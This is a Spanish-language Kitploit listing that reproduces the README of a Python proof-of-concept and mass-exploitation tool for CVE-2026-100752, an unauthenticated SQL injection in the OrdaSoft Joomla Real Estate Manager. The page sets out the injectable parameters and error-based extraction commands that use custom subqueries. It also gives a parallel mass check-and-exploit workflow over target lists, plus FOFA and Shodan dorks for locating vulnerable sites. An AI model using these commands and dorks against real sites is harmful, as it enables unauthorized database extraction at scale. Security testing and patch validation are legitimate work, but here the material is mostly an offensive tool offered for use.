Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-100752 — PoC en Python 3 y exploit masivo para CVE-2026-100752, una inyección SQL no autenticada en OrdaSoft Joomla Real Estate Manager <=6.7.8 a través del parámetro order_field ORDER BY. | Kitploit
Herramientas/GitHubGitHub/murrez/cve-2026-100752
ReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónScripting y AutomatizaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmurrez/cve-2026-100752

CVE-2026-100752

hace 4 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

PoC en Python 3 y exploit masivo para CVE-2026-100752, una inyección SQL no autenticada en OrdaSoft Joomla Real Estate Manager <=6.7.8 a través del parámetro order_field ORDER BY.

Ver Repositorio
Compartir

CVE-2026-100752 — Inyección SQL no autenticada en OrdaSoft Real Estate Manager (Free)

PoC en Python 3 para CVE-2026-100752 — extensión Joomla OrdaSoft Real Estate Manager (Free) ≤ 6.7.8. Corregido en 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Catálogohttps://pocbit.org/pocs/
Componentecom_realestatemanager
Archivosite/realestatemanager.php
Parámetroorder_field → ORDER BY (sin comillas, sin lista de permitidos)
AutenticaciónNinguna (listado público / búsqueda / vistas de categoría)
CWECWE-89 Inyección SQL
TambiénInyección POST heredada en order_direction (auditorías de Metasploit / anteriores a 6.7.9)

Salida del PoC (captura de pantalla)

Banner colorido de PoCbit, seguido de la salida JSON de --mode exploit: exploited: true, vector order_field_get, ruta showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

Comando de ejemplo:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(La captura de pantalla se tomó de un entorno de pruebas autorizado; la URL de destino es para la validación del PoC.)


Resumen de la vulnerabilidad (Türkçe)

Real Estate Manager (Free) es una extensión de OrdaSoft que gestiona anuncios inmobiliarios sobre Joomla. En las versiones 6.7.8 y anteriores, el parámetro de solicitud order_field se añade directamente a la cláusula ORDER BY dentro de site/realestatemanager.php; no hay lista de permitidos de nombres de columna, escape ni cast. Sin autenticación, se pueden explotar las consultas de navegación por categorías, resultados de búsqueda y listado completo de anuncios.

Con un SQLi exitoso se debe evaluar el riesgo de lectura desde la base de datos (versión, hashes de usuarios, datos del sitio), escritura/borrado según privilegios y RCE en cadena. Actualice a la versión 6.7.9 o superior (OrdaSoft security release).


Mecanismo técnico

Controlador frontal de Joomla:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: order_field controla la columna/expresión de ORDER BY. Se pueden inyectar valores como subconsultas basadas en errores porque el valor se concatena en el SQL sin binding ni validación.

Contextos de consulta afectados (según el texto del CVE):

  1. Navegación por categorías (showCategory y relacionados)
  2. Resultados de búsqueda
  3. Listado completo de propiedades

Este PoC:

  • Fingerprint de com_realestatemanager (rutas + versión opcional del manifest)
  • Extrae catid / Itemid del HTML del sitio
  • Prueba tareas: showCategory, showSearch, showSearchResult, showRent, showBuy
  • Principal: GET y POST basados en errores de order_field
  • Fallback: order_direction=asc,<injection> (vector histórico, aún útil en algunas compilaciones)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (líneas con fuga exitosa de SELECT)

Requisitos

cd CVE-2026-100752
pip install -r requirements.txt

Uso

Objetivo único — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive intenta SELECT VERSION() cuando la prueba booleana/de error no es concluyente.

Objetivo único — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Masivo

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagFunción
--mode exploitExtracción de datos basada en errores (soporta modo masivo)
--subquerySQL interno para el payload de doble consulta CONCAT(0x7e, …)
--vectorFuerza order_field_get, order_field_post u order_direction_post
-jObjetivos en paralelo
--no-colorTerminal sin color

JSONL incluye pocbit, pocbit_catalog, pocbit_page, cve, component.


Dorks de FOFA / descubrimiento de activos

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Estilo Shodan (si está soportado): http.html:com_realestatemanager

Exporte los hostnames a targets.txt (una URL por línea), luego check → hits → exploit solo en inmuebles autorizados.


Detección de versión

Manifest (cuando está expuesto):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

Si la versión es ≤ 6.7.8 → likely_vulnerable_version. Si es ≥ 6.7.9 → patched_version (el exploit puede fallar igualmente).


CVEs relacionados (misma tanda de versiones)

CVETipoCorregido
CVE-2026-100752SQLi no autenticada (order_field)6.7.9
CVE-2026-100753XSS reflejado (vistas públicas de propiedades)6.7.9

Mismo lote del proveedor (sep 2026): Vehicle Manager y otras extensiones de OrdaSoft recibieron CVEs separados — parchee todos los componentes de OrdaSoft que utilice.


Referencias

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six flaws in three OrdaSoft extensions (sep 2026)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (POST heredado order_direction)

Legal

Solo para pruebas de seguridad autorizadas y validación de parches. No lo use contra sistemas sin permiso.


Descripción del repositorio de GitHub

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
Descargar herramienta